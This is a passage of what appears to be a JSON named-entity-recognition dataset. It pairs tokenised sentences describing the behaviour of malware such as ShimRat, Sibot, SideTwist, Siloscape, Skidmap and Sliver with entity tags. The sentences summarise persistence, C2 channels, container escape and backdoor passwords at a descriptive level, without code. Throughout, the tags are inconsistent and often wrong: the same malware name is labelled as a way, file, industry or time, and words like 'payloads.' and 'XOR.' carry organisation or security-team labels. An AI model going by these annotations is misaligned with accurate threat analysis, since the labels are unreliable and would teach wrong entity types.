"I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "installed", - "a", - "registry", - "based", - "start-up", - "key", - "<code>HKCU\\Software\\microsoft\\windows\\CurrentVersion\\Run</code>", - "to", - "maintain", - "persistence", - "should", - "other", - "methods", - "fail." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "sleep", - "when", - "instructed", - "to", - "do", - "so", - "by", - "the", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat's", - "loader", - "has", - "been", - "packed", - "with", - "the", - "compressed", - "ShimRat", - "core", - "DLL", - "and", - "the", - "legitimate", - "DLL", - "for", - "it", - "to", - "hijack." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "communicated", - "over", - "HTTP", - "and", - "HTTPS", - "with", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "can", - "be", - "issued", - "a", - "command", - "shell", - "function", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRat", - "has", - "installed", - "a", - "Windows", - "service", - "to", - "maintain", - "persistence", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "listed", - "all", - "non-privileged", - "and", - "privileged", - "accounts", - "available", - "on", - "the", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "used", - "LZ", - "compression", - "to", - "compress", - "initial", - "reconnaissance", - "reports", - "before", - "sending", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "gathered", - "information", - "automatically,", - "without", - "instruction", - "from", - "a", - "C2,", - "related", - "to", - "the", - "user", - "and", - "host", - "machine", - "that", - "is", - "compiled", - "into", - "a", - "report", - "and", - "sent", - "to", - "the", - "operators." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "sent", - "collected", - "system", - "and", - "network", - "information", - "compiled", - "into", - "a", - "report", - "to", - "an", - "adversary-controlled", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "sent", - "generated", - "reports", - "to", - "the", - "C2", - "via", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "had", - "the", - "ability", - "to", - "download", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "spoofed", - "itself", - "as", - "<code>AlphaZawgyl_font.exe</code>,", - "a", - "specialized", - "Unicode", - "font." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "used", - "several", - "Windows", - "API", - "functions", - "to", - "gather", - "information", - "from", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "encrypted", - "gathered", - "information", - "with", - "a", - "combination", - "of", - "shifting", - "and", - "XOR", - "using", - "a", - "static", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "gathered", - "the", - "local", - "privileges", - "for", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "listed", - "all", - "running", - "processes", - "on", - "the", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "gathered", - "a", - "list", - "of", - "installed", - "software", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "gathered", - "the", - "operating", - "system", - "name", - "and", - "specific", - "Windows", - "version", - "of", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "gathered", - "the", - "local", - "proxy,", - "domain,", - "IP,", - "routing", - "tables,", - "mac", - "address,", - "gateway,", - "DNS", - "servers,", - "and", - "DHCP", - "status", - "information", - "from", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "used", - "the", - "Windows", - "function", - "<code>GetExtendedUdpTable</code>", - "to", - "detect", - "connected", - "UDP", - "endpoints." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ShimRatReporter", - "communicated", - "over", - "HTTP", - "with", - "preconfigured", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "obfuscated", - "scripts", - "used", - "in", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "can", - "decrypt", - "data", - "received", - "from", - "a", - "C2", - "and", - "save", - "to", - "a", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "will", - "delete", - "itself", - "if", - "a", - "certain", - "server", - "response", - "is", - "received." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "installed", - "a", - "second-stage", - "script", - "in", - "the", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot</code>", - "registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "will", - "delete", - "an", - "associated", - "registry", - "key", - "if", - "a", - "certain", - "server", - "response", - "is", - "received." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "can", - "download", - "and", - "execute", - "a", - "payload", - "onto", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "downloaded", - "a", - "DLL", - "to", - "the", - "<code>C:\\windows\\system32\\drivers\\</code>", - "folder", - "and", - "renamed", - "it", - "with", - "a", - "<code>.sys</code>", - "extension." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "modified", - "the", - "Registry", - "to", - "install", - "a", - "second-stage", - "script", - "in", - "the", - "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "been", - "executed", - "via", - "MSHTA", - "application." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "queried", - "the", - "registry", - "for", - "proxy", - "server", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "executed", - "downloaded", - "DLLs", - "with", - "<code>rundll32.exe</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "been", - "executed", - "via", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "checked", - "if", - "the", - "compromised", - "system", - "is", - "configured", - "to", - "use", - "proxies." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "retrieved", - "a", - "GUID", - "associated", - "with", - "a", - "present", - "LAN", - "connection", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "executes", - "commands", - "using", - "VBScript." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Sibot", - "communicated", - "with", - "its", - "C2", - "server", - "via", - "HTTP", - "GET", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "used", - "a", - "legitimate", - "compromised", - "website", - "to", - "download", - "DLLs", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sibot", - "has", - "used", - "WMI", - "to", - "discover", - "network", - "connections", - "and", - "configurations.", - "Sibot", - "has", - "also", - "used", - "the", - "Win32_Process", - "class", - "to", - "execute", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "can", - "embed", - "C2", - "responses", - "in", - "the", - "source", - "code", - "of", - "a", - "fake", - "Flickr", - "webpage." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "the", - "ability", - "to", - "upload", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "can", - "decode", - "and", - "decrypt", - "messages", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "exfiltrated", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "primarily", - "used", - "port", - "443", - "for", - "C2", - "but", - "can", - "use", - "port", - "80", - "as", - "a", - "fallback." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "the", - "ability", - "to", - "search", - "for", - "specific", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "the", - "ability", - "to", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "can", - "use", - "<code>GetUserNameW</code>,", - "<code>GetComputerNameW</code>,", - "and", - "<code>GetComputerNameExW</code>", - "to", - "gather", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "used", - "Base64", - "for", - "encoded", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "can", - "encrypt", - "C2", - "communications", - "with", - "a", - "randomly", - "generated", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "can", - "collect", - "the", - "computer", - "name", - "of", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "the", - "ability", - "to", - "collect", - "the", - "domain", - "name", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "can", - "collect", - "the", - "username", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "has", - "used", - "HTTP", - "GET", - "and", - "POST", - "requests", - "over", - "port", - "443", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SideTwist", - "can", - "execute", - "shell", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "connects", - "to", - "an", - "IRC", - "server", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "can", - "send", - "kubectl", - "commands", - "to", - "victim", - "clusters", - "through", - "an", - "IRC", - "channel", - "and", - "can", - "run", - "kubectl", - "locally", - "to", - "spread", - "once", - "within", - "a", - "victim", - "cluster." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "has", - "decrypted", - "the", - "password", - "of", - "the", - "C2", - "server", - "with", - "a", - "simple", - "byte", - "by", - "byte", - "XOR.", - "Siloscape", - "also", - "writes", - "both", - "an", - "archive", - "of", - "Tor", - "and", - "the", - "<code>unzip</code>", - "binary", - "to", - "disk", - "from", - "data", - "embedded", - "within", - "the", - "payload", - "using", - "Visual", - "Studio’s", - "Resource", - "Manager." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "maps", - "the", - "host’s", - "C", - "drive", - "to", - "the", - "container", - "by", - "creating", - "a", - "global", - "symbolic", - "link", - "to", - "the", - "host", - "through", - "the", - "calling", - "of", - "<code>NtSetInformationSymbolicLink</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "is", - "executed", - "after", - "the", - "attacker", - "gains", - "initial", - "access", - "to", - "a", - "Windows", - "container", - "using", - "a", - "known", - "vulnerability." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "has", - "leveraged", - "a", - "vulnerability", - "in", - "Windows", - "containers", - "to", - "perform", - "an", - "Escape", - "to", - "Host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "searches", - "for", - "the", - "Kubernetes", - "config", - "file", - "and", - "other", - "related", - "files", - "using", - "a", - "regular", - "expression." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "uses", - "Tor", - "to", - "communicate", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "makes", - "various", - "native", - "API", - "calls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "itself", - "is", - "obfuscated", - "and", - "uses", - "obfuscated", - "API", - "calls." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "checks", - "for", - "Kubernetes", - "node", - "permissions." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "searches", - "for", - "the", - "kubectl", - "binary." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "impersonates", - "the", - "main", - "thread", - "of", - "<code>CExecSvc.exe</code>", - "by", - "calling", - "<code>NtImpersonateThread</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Siloscape", - "can", - "run", - "cmd", - "through", - "an", - "IRC", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skeleton", - "Key", - "is", - "used", - "to", - "patch", - "an", - "enterprise", - "domain", - "controller", - "authentication", - "process", - "with", - "a", - "backdoor", - "password.", - "It", - "allows", - "adversaries", - "to", - "bypass", - "the", - "standard", - "authentication", - "system", - "to", - "use", - "a", - "defined", - "password", - "for", - "all", - "accounts", - "authenticating", - "to", - "that", - "domain", - "controller." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "installed", - "itself", - "via", - "crontab." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "download,", - "unpack,", - "and", - "decrypt", - "tar.gz", - "files", - "." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "set", - "SELinux", - "to", - "permissive", - "mode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "encrypted", - "it's", - "main", - "payload", - "using", - "3DES." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "checked", - "for", - "the", - "existence", - "of", - "specific", - "files", - "including", - "<code>/usr/sbin/setenforce</code>", - "and", - "<code>", - "/etc/selinux/config</code>.", - "It", - "also", - "has", - "the", - "ability", - "to", - "monitor", - "the", - "cryptocurrency", - "miner", - "file", - "and", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "download", - "files", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "install", - "several", - "loadable", - "kernel", - "modules", - "(LKMs)", - "on", - "infected", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "created", - "a", - "fake", - "<code>rm</code>", - "binary", - "to", - "replace", - "the", - "legitimate", - "Linux", - "binary." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "replace", - "the", - "pam_unix.so", - "file", - "on", - "an", - "infected", - "machine", - "with", - "its", - "own", - "malicious", - "version", - "that", - "accepts", - "a", - "specific", - "backdoor", - "password", - "for", - "all", - "users." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "monitored", - "critical", - "processes", - "to", - "ensure", - "resiliency." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "is", - "a", - "kernel-mode", - "rootkit", - "used", - "for", - "cryptocurrency", - "mining." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "is", - "a", - "kernel-mode", - "rootkit", - "that", - "has", - "the", - "ability", - "to", - "hook", - "system", - "calls", - "to", - "hide", - "specific", - "files", - "and", - "fake", - "network", - "and", - "CPU-related", - "statistics", - "to", - "make", - "the", - "CPU", - "load", - "of", - "the", - "infected", - "machine", - "always", - "appear", - "low." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "add", - "the", - "public", - "key", - "of", - "its", - "handlers", - "to", - "the", - "<code>authorized_keys</code>", - "file", - "to", - "maintain", - "persistence", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "check", - "if", - "<code>/usr/sbin/setenforce</code>", - "exists.", - "This", - "file", - "controls", - "what", - "mode", - "SELinux", - "is", - "in." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "the", - "ability", - "to", - "check", - "whether", - "the", - "infected", - "system’s", - "OS", - "is", - "Debian", - "or", - "RHEL/CentOS", - "to", - "determine", - "which", - "cryptocurrency", - "miner", - "it", - "should", - "use." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Skidmap", - "has", - "used", - "<code>pm.sh</code>", - "to", - "download", - "and", - "install", - "its", - "main", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "has", - "the", - "ability", - "to", - "manipulate", - "user", - "tokens", - "on", - "targeted", - "Windows", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "use", - "mutual", - "TLS", - "and", - "RSA", - "cryptography", - "to", - "exchange", - "a", - "session", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "support", - "C2", - "communications", - "over", - "DNS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "encrypt", - "strings", - "at", - "compile", - "time." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "exfiltrate", - "files", - "from", - "the", - "victim", - "using", - "the", - "<code>download</code>", - "command." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "enumerate", - "files", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "upload", - "files", - "from", - "the", - "C2", - "server", - "to", - "the", - "victim", - "machine", - "using", - "the", - "<code>upload</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "inject", - "code", - "into", - "local", - "and", - "remote", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sliver", - "can", - "take", - "screenshots", - "of", - "the", - "victim’s", - "active", - "display." - ], - 